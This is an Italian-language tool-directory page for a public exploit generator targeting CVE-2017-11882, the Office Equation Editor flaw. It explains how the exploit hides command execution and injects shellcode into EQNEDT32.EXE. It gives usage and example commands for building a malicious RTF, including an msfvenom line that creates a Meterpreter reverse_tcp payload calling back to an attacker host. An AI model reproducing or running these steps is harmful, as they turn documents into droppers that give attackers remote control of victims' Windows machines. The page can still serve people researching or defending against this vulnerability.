Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2017-11882 — CVE-2017-11882 Exploit accetta comandi/codice di lunghezza superiore a 17k byte al massimo. | Kitploit
Strumenti/GitHubGitHub/rip1s/cve-2017-11882
Generazione di PayloadAnalisi delle VulnerabilitàExploitShellcodeSfruttamento di Applicazioni WebPenetration TestingBinary Exploitation
GitHubrip1s/cve-2017-11882

CVE-2017-11882

CVE-2017-11882 Exploit accetta comandi/codice di lunghezza superiore a 17k byte al massimo.

Vedi Repository
330928 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Exploit per CVE-2017-11882

L'exploit CVE-2017-11882 accetta comandi/codice lunghi fino a oltre 17k byte.

Per l'esecuzione remota di comandi, questo exploit chiama WinExec con SW_HIDE e chiama ExitProcess dopo che WinExec ritorna.

Per l'esecuzione remota di codice, questo exploit salta semplicemente al codice.

Non riesco a trovare un riferimento per la struttura dell'oggetto... quindi non posso cambiare la lunghezza del file per l'esecuzione di codice di lunghezza arbitraria..:(

Ma penso davvero che 17k byte siano sufficienti. Lo script Python rileverà la dimensione del payload necessaria e sceglierà il template corretto.

Attenzione: l'RCE bloccherà il processo winword se non si esegue la migrazione a un altro processo!

Attualmente questo exploit inietta il tuo shellcode nel nuovo processo EQNEDT32.EXE se specifichi il flag -i. Questa operazione è sospetta per l'antivirus ma non bloccherà il processo di Word.

Utilizzo

root@kitploit:~
usage: CVE-2017-11882.py [-h] -c CMD [-t {0,1}] [-i INJECT] -o OUTPUT

Exploit per CVE-2017-11882 @unamer(https://github.com/unamer/CVE-2017-11882)

optional arguments:
  -h, --help            mostra questo messaggio di aiuto ed esci
  -c CMD, --cmd CMD     Comando o file di shellcode da eseguire nel sistema target
                        (Deve essere più corto di 17967 byte!!)
  -t {0,1}, --type {0,1}
                        Tipo (0:shellcode 1:comando, default=1)
  -i INJECT, --inject INJECT
                        Inietta shellcode in un nuovo processo
  -o OUTPUT, --output OUTPUT
                        Output dell'exploit rtf

Esempio:

Per l'esecuzione remota di comandi:

root@kitploit:~
CVE-2017-11882.py -c cmd.exe -o test.rtf

Per l'esecuzione remota di codice:

  1. Genera dello shellcode
root@kitploit:~
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.115 LPORT=2333 -o ./sc.bin
  1. Genera l'exploit
root@kitploit:~
CVE-2017-11882.py -c sc.bin -t 0 -i 1 -o test.rtf

Debug

  1. Imposta il valore del debugger sul percorso del tuo debugger in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\EQNEDT32.EXE

  2. Costruisci un exploit ed eseguilo.

  3. Imposta un punto di interruzione a 0x41165f

  4. Questo punto di interruzione verrà colpito due volte; alla seconda volta il payload verrà eseguito dopo il ritorno di questa funzione.

Riferimenti

  1. https://github.com/embedi/CVE-2017-11882
  2. https://embedi.com/files/white-papers/skeleton-in-the-closet.pdf
  3. https://0patch.blogspot.co.id/2017/11/did-microsoft-just-manually-patch-their.html
Scarica lo strumento